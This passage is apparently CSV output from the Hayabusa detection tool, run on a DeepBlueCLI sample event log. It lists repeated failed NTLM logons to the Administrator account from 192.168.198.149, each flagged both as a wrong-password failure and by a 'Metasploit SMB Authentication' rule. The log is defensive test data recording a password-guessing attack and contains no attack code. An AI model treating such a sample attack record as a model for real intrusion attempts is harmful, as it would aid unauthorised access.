Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GH7dTevmTKZo46Tq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l2E8JmrfaCj5AjSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N4FLUvawWPVqdLaD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KN0EeUzxSZy5l7J4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8FjH0QHqromIYWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fhlF37S1wNupiX5O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j19XhmSXK526I8kf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IRcppJXDNNfKuvdc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0FoGAIAK2FV3zCJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uYWIk76XIksgN3sE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3FEop7o3SOolNvKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMGEM3ql9uov7zCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EFPUA4pUPaLrkr1I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7IeJU89jxitz407 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wqj9nXRaDpwCJZO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bl0d61v2Ux7cNv4r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LxTa5lyutrIB2cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPCy11e3YxcCloSH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mj07WKc4aQqPC0Te : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2M3v4TsQul5R4sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I67uBcH52tgLzhVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hsth68FDJ4F10H6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDoHrfWlaWZ5GbWV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uliC5Wd7uZR3fIBc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: Xhg4hg4XDFaXsJRe : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: ZrSGxwUyV6gCUPeb : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUBgTr05x3djEYdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 40PhGU4ZXu7uihop : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1DJ9r72hXZH9rEkb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: khy2BeyBb9wq00f7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1cDckicL7IMrO7OQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEEkvfVd3FCap6fa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGFSyHQ0ZNWofxzE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItOZqZSDTrdWpkbp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhNdf5lHfrHKSCXq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xg05F6tdf3kR9kdP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 70rRbaC6L6SzT15q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnJyN8wF21ff2L1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MUZHZJMQznj6GBqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P9h52ZKMbXLuFvUV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n95RJvcQnFrAG2iX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xI23nmysFlr1pvVf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nVsjcTxDdZbzkmMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMuWatQuNBh9UKdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfC3JZ3awqFDNQbm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 337h8PHN6Axi0iaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qGQpWOuzgETfxTgJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 